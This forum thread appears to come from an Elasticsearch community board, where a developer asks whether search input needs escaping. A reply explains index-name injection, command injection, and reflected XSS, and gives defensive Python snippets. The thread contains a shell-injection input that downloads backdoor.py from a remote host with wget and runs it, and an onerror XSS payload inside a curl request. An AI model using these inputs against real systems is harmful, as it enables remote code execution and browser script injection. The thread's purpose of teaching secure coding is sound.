Should I escape or validate query terms before using the es client?

Hi,
I'm trying out ES with a simple project. A web page with a search box (i.e., like Google) and a backend ES client sending the query terms to the search engine.

So I receive "XPTO" from the web form, and I use the ES client to query the index. I'm using the simplified query format.

Although "you shall validate the input" is the rule, I'm thinking I don't have to, because "XPTO" will be the input to the query, so the ES client should do the validation. Besides, my knowledge of ES is limited (as is everyone's), so ES would really be the one doing this kind of validation and escaping (if necessary).

Even if I change the analyzer and allow more symbols than the standard one does, I would not know what to escape. How would I do that?

I'm also thinking I should validate the ES response before showing it in the web page, escaping it for HTML and JavaScript.

Am I missing some security concern here?
Thanks for your thoughts (and messages).

Short answer: Yes, you should probably do both input validation and output sanitization.

Input Validation

You should always assume there will be malicious users. The payload won't always be "XPTO". Depending on which client you use and how you use the user input to build your queries, there are attack vectors that can be dangerous. In the simplistic case where you want to allow access only to cesar_* indices, and your web app takes the user input (e.g. "xpto") and feeds it to curl to request all documents of the cesar_xpto index using a template such as

curl -uelastic:password -X GET "localhost:9200/cesar_{}/_search"

, the command will become

curl -uelastic:password -X GET "localhost:9200/cesar_xpto/_search"

What happens if the user specifies xpto,.security as the input? The request then becomes

curl -uelastic:password -X GET "localhost:9200/cesar_xpto,.security/_search"

and the user gets access to the documents of the internal security index. As I said, this is a very simplistic example, and in this case a more interesting attack vector would be command injection (e.g. an attacker using " && wget http://a.b.com/backdoor.py && chmod +x backdoor.py && ./backdoor.py as input), but I just wanted to illustrate a possibility.
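One way to close off both the extra-index and the command-injection cases is to accept only input that matches a strict allowlist before it is ever placed in an index name. The following is a minimal sketch, not a definitive implementation: the function name index_for, the 32-character cap, and the allowed character set are assumptions chosen for illustration.

```python
import re

# Hypothetical policy: the user-supplied suffix may contain only lowercase
# ASCII letters, digits, and underscores, and is capped at 32 characters.
_SUFFIX_RE = re.compile(r"[a-z0-9_]{1,32}")


def index_for(user_input: str) -> str:
    """Return the cesar_* index name for a validated suffix.

    Raises ValueError for anything outside the allowlist, which includes
    commas, dots, wildcards, quotes, spaces, and shell metacharacters.
    """
    suffix = user_input.strip().lower()
    if not _SUFFIX_RE.fullmatch(suffix):
        raise ValueError("invalid index suffix")
    return "cesar_" + suffix
```

With this check, "XPTO" maps to cesar_xpto, while xpto,.security and the wget payload are rejected before any request is built.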

If you use, for example, the Java high-level REST client to build your queries, you'll be much safer from injection attacks in the ES layer, but your application might still be susceptible to other attack types. Also, you should think about DoS attacks, where users might be able to run multiple consecutive expensive queries, causing CPU/memory starvation in your ES cluster.
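The same idea applies without any particular client library: build the request body as structured data instead of concatenating strings, and cap what a single request can ask for. The sketch below makes several assumptions for illustration: the field name content, the limits, and the helper name build_search_body are all hypothetical. It uses a match query, which analyzes the text rather than parsing it as query syntax, so operators typed by the user are treated as plain search text.

```python
import json

MAX_QUERY_CHARS = 200  # hypothetical cap on the length of the search text
MAX_HITS = 20          # hypothetical cap on the number of returned hits


def build_search_body(user_text: str, field: str = "content") -> dict:
    """Build a search request body as a dict; the user text is only a value."""
    text = user_text.strip()[:MAX_QUERY_CHARS]
    return {
        "size": MAX_HITS,   # bound the response size
        "timeout": "2s",    # ask Elasticsearch to bound the search time
        "query": {"match": {field: {"query": text}}},
    }


# JSON serialization takes care of quoting, so the input cannot change
# the structure of the request.
payload = json.dumps(build_search_body('xpto" OR *:*'))
```

These caps only limit the cost of one request; rate limiting across requests still has to happen in the web application or in front of it.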

Output Sanitization

Elasticsearch will return JSON responses (i.e. with the HTTP response header content-type: application/json; charset=UTF-8). That means that even if ES reflects back portions of the query, which it does in the case of an error, there is no danger of reflected XSS, as the browser will not interpret the response as HTML. However, if you take the response and present it to the user in the context of a web app, then things change. For instance:

curl -uelastic:password  -X GET 'localhost:9200/something<img%20src=x%20onerror=alert(1))>'

will get the following response from Elasticsearch

{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"}],"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"},"status":404}

Now if you take this and put it as is in the response page of your web app without escaping it, the <img src=x onerror=alert(1))> part will be parsed as HTML and its onerror handler will be executed in the user's browser. Again, just an example.
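For the HTML case, escaping any value that came from Elasticsearch before it is placed in the page is enough to neutralize this example. Here is a minimal sketch using html.escape from the Python standard library; the helper name render_message and the surrounding <p> tag are assumptions for illustration, and a template engine with auto-escaping enabled would normally do this for you.

```python
import html


def render_message(es_text: str) -> str:
    """Wrap a value taken from an ES response in a paragraph, HTML-escaped."""
    # html.escape replaces &, <, > and (with quote=True) both quote characters.
    return "<p>" + html.escape(es_text, quote=True) + "</p>"


reflected = "something<img src=x onerror=alert(1))>"
print(render_message(reflected))
# prints: <p>something&lt;img src=x onerror=alert(1))&gt;</p>
```

This covers text placed in HTML element content and quoted attribute values; values embedded inside a script block need escaping suited to that context instead.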

Least Privilege Principle

Another thing worth noting is that you should not run all the queries as a superuser (i.e. the elastic user). Figure out the least privileges your users will need, create a role that has these privileges, assign the role to a service account user, and use that user to make the requests to Elasticsearch via the client. This way, even if a user finds a way to trick your application logic, the impact on your Elasticsearch cluster will be contained.
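As a rough illustration of what such a role could look like, the sketch below builds the body one might send to the create-role security API (PUT /_security/role/<name>), granting only the read index privilege on the cesar_* indices. The role name and the helper read_only_role are hypothetical, and the exact privileges your application needs may differ.

```python
import json

ROLE_NAME = "cesar_search_reader"  # hypothetical role name


def read_only_role(index_pattern: str) -> dict:
    """Return a role body that grants read access to one index pattern only."""
    return {
        "indices": [
            {"names": [index_pattern], "privileges": ["read"]},
        ],
    }


# Body for: PUT /_security/role/cesar_search_reader
role_body = json.dumps(read_only_role("cesar_*"), indent=2)
```

A service account holding only this role could not read the .security index from the earlier example, even if the index-name check in the application were bypassed.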

Hope this helps

Hi ikakavas! Thanks for the detailed answer!

In fact, I'm using the high-level Python client: https://elasticsearch-dsl.readthedocs.io/en/latest/

But I think I face the same concerns as with the Java one.

So, the next logical question is: what should I escape? I didn't find documentation about that in the client's docs. The DoS attack is easier to deal with, as it is not ES-specific. However, escaping is. And how would that change if I change the default analyzer (allowing some special characters in the database and in the queries)? Are there any guidelines or documentation about input validation or escaping that I could follow?

Thanks in advance.

Does anyone know of such documentation?

Or does it depend on the analyzer?

Bump
